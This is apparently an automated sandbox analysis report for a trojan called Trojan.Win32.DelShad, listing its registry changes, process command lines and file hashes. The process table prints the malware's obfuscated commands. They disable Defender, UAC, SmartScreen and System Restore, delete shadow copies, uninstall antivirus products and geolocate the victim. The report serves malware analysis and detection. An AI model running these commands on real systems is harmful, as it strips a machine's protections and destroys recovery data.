| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | "C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" |
| C:\Users\Admin\AppData\Local\Temp\is-M7KKU.tmp\Trojan.Win32.DelShad.tmp | "C:\Users\Admin\AppData\Local\Temp\is-M7KKU.tmp\Trojan.Win32.DelShad.tmp" /SL5="$50150,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" |
| C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | "C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp- |
| C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp | "C:\Users\Admin\AppData\Local\Temp\is-MKHMM.tmp\Trojan.Win32.DelShad.tmp" /SL5="$60150,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp- |
| C:\Windows\SysWOW64\taskkill.exe | "C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr" |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\pik.exe | "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\pik.exe" |
| C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\tmp\.vbs" |
| C:\Windows\System32\cmd.exe | cmd /c ""C:\tmp\.cmd" " |
| C:\Windows\system32\reg.exe | rEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F |
| C:\Windows\system32\reg.exe | reg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f |
| C:\Windows\system32\reg.exe | rEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f |
| C:\Windows\system32\reg.exe | reg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f |
| C:\Windows\system32\reg.exe | reG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f |
| C:\Windows\system32\reg.exe | reG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F |
| C:\Windows\system32\reg.exe | rEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F |
| C:\Windows\system32\reg.exe | rEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F |
| C:\Windows\system32\reg.exe | reG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f |
| C:\Windows\system32\reg.exe | rEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f |
| C:\Windows\system32\reg.exe | rEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f |
| C:\Windows\system32\reg.exe | reG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f |
| C:\Windows\system32\reg.exe | rEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F |
| C:\Windows\system32\reg.exe | reG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f |
| C:\Windows\system32\reg.exe | reG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F |
| C:\Windows\system32\reg.exe | reg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F |
| C:\Windows\system32\reg.exe | rEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F |
| C:\Windows\system32\reg.exe | reG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F |
| C:\Windows\system32\reg.exe | reg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F |
| C:\Windows\system32\reg.exe | rEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f |
| C:\Windows\system32\reg.exe | reg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f |
| C:\Windows\system32\reg.exe | rEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f |
| C:\Windows\system32\reg.exe | reG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F |
| C:\Windows\system32\reg.exe | rEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F |
| C:\Windows\system32\reg.exe | rEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F |
| C:\Windows\system32\reg.exe | reG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f |
| C:\Windows\system32\reg.exe | rEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f |
| C:\Windows\system32\icacls.exe | icaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C |
| C:\Windows\system32\icacls.exe | iCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c |
| C:\Windows\system32\vssadmin.exe | vssadmin dELETe shadOws /aLl /QuIEt |
| C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\.cmd"" |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | rp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | rP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | rP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F |
| C:\Windows\system32\rEG.EXE | "C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | rp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f |
| C:\Windows\system32\rEg.EXE | "C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F |
| C:\Windows\system32\makecab.exe | "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241114235820.log C:\Windows\Logs\CBS\CbsPersist_20241114235820.cab |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f |
| C:\Windows\system32\rEg.EXE | "C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F |
| C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe | "C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f |
| C:\Windows\system32\attrib.exe | aTTrIb +S +H C:\TMP |
| C:\Windows\system32\find.exe | find /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\rEG.EXE | "C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f |
| C:\Windows\system32\find.exe | find /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\system32\find.exe | find /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts" |
| C:\Windows\System32\Wbem\WMIC.exe | wmic product where name="ESET Security" call uninstall /nointeractive |
| C:\Windows\system32\msiexec.exe | C:\Windows\system32\msiexec.exe /V |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\.cmd"" |
| C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | "C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c cuRL -S IPINfo.Io/city |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c CUrl -s IPiNfo.io/country |
| C:\Windows\System32\Wbem\WMIC.exe | wmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive |
| C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f |
| C:\Windows\system32\cmd.exe | cmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f |
| C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | "C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr" |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 88.221.134.83:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | csc3-2004-crl.verisign.com | udp |
Files
memory/2136-0-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/2136-2-0x0000000000401000-0x00000000004B7000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-M7KKU.tmp\Trojan.Win32.DelShad.tmp
| MD5 | 40627c5fe58bb5a60606e5be621af052 |
| SHA1 | c21ec14767478d0e4bd1184ad6c2c280e2d1342f |
| SHA256 | bd4cbba2f23b512fad5b0c84d2e9502e4bfea75cac78482d22036968e8224b42 |
| SHA512 | e418ed7c9768a4237622be7a53b761a45ca4d4cf37643fcfdf9cb2f200a95fc904b213fb1a37befb86e6ff93ae3c5ff0f39243305789236d4031e017ec99085d |
memory/2328-9-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2820-12-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/2328-14-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2136-16-0x0000000000400000-0x00000000004E3000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\pik.exe
| MD5 | 78c269b72f5b1d9bd4654cef3fb4a986 |
| SHA1 | c44db702175e2d474e3221a0de14f01c1f35129b |
| SHA256 | ace03b12b8763bd8567425f288ded8f8f0d9acd62f81de17414bd300d21820ab |
| SHA512 | bc9abf69debc967df59e16491ec533ab59b997d8ea89d7ebc1ba0a04b319d5f3746cd9e22b8b2c10b4ce655fb5a813be08214e142e97107cb07222f7dc19bee5 |
memory/2268-190-0x00000000008B0000-0x00000000008D6000-memory.dmp
memory/2268-191-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2268-194-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2268-192-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2268-200-0x0000000000530000-0x0000000000630000-memory.dmp
memory/2268-197-0x0000000000530000-0x0000000000630000-memory.dmp
C:\tmp\.vbs
| MD5 | 2e2fa9827b9d476133f122be9012408c |
| SHA1 | 3a3d0d1135f95227693a46a110312a3c1a177c51 |
| SHA256 | 184fb09c2a02a1e5d23c9abe64affd866a919b7b287622069371716223f3b1b6 |
| SHA512 | 2e4a431fca5dada81cb22af865b122635b9b93e89b3948e86a2d6dd0c4b8eadbcf594ea1fb817818738468a831ecac75d7247d226d4ce901a9aaec66bc2c0e89 |
C:\tmp\.cmd
| MD5 | dee7acbdbf3f448057dae93e28514690 |
| SHA1 | ae56d802230bc13e7663be388781d7d1aa1ef3d0 |
| SHA256 | 5ec9a6efe3c3451a967335bf7d7bcb2f916fc8ba81c0b1118018d079fbffb5ec |
| SHA512 | 77cdd3ab66e49267907e3711ab7878469976ba677a683bead7d5e63353b03164345aef0ca0dd5d124488eca7cfef1f64ebde363d76596ef882cb2c56e1f41504 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk
| MD5 | 759759e2720dbe15d074eec781955674 |
| SHA1 | ba1eafb270051bad0edada4ecb930e9a800c12ca |
| SHA256 | 87099c8f93e7e21a823dbde41971c233209abc9877c20134464dfe670a7ad211 |
| SHA512 | dffbf9982ac19cab3f07bb5c7d7b62e2aecb4d620c6b2dae4aab8865d2bf27aafa1556ef59131751b2a444e8f7b8dbbc78ba6ba7ea796ced87ab0a9a44fc8596 |
C:\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\.cmd
| MD5 | 22a845995279c76177c613100a58d134 |
| SHA1 | 5cc94610bcdba7b0d514b711852a6cdb56db3ae1 |
| SHA256 | ca30adad79ccd83b3dc79f26a58c1552559176f8a271237c6d4d7ccf307920c0 |
| SHA512 | 0a4a3eb765847ab66e847bb83202ee8ad5d8591659a8be9e3ed4b6863f3aac28f9d4f6e2d4ca5c5efe800cfe30d471122b2f96807c2735dde5c6ade16c064cad |
\Users\Admin\AppData\Local\Temp\is-E4R4U.tmp\tmp\rp.exe
| MD5 | 408dd6ade80f2ebbc2e5470a1fb506f1 |
| SHA1 | e00293ce0eb534874efd615ae590cf6aa3858ba4 |
| SHA256 | 4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71 |
| SHA512 | 4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0 |
C:\Users\Admin\AppData\Local\Temp\2u7w4e4q.tmp
| MD5 | a69e54b63a067cefab41736717e9348b |
| SHA1 | 96e00b5f3170d19d173e62b97c1691fac8edfb98 |
| SHA256 | c72184932dd0541095be4827e5f86b3db735cfc651f04b50a1cc783d9037d75d |
| SHA512 | 13385b98377cb664907a5189cbf63f575c86b5b705df2a458ae21c6fd63f6cbf77451e8f17b22af8921a3342f31445278cb8450e1cc58fe33eecffe81e56cdda |
C:\Windows\Temp\2z9k4c4q.tmp
| MD5 | 31c5a8d7f0d900bfff09d437a7457478 |
| SHA1 | c32f7abbc47949c340a2136bb8cc4787f05b1eff |
| SHA256 | 89da44ebaa36a31740f9dbc585cefc3f55cf725f7d8d745b44ba259f0a1d8455 |
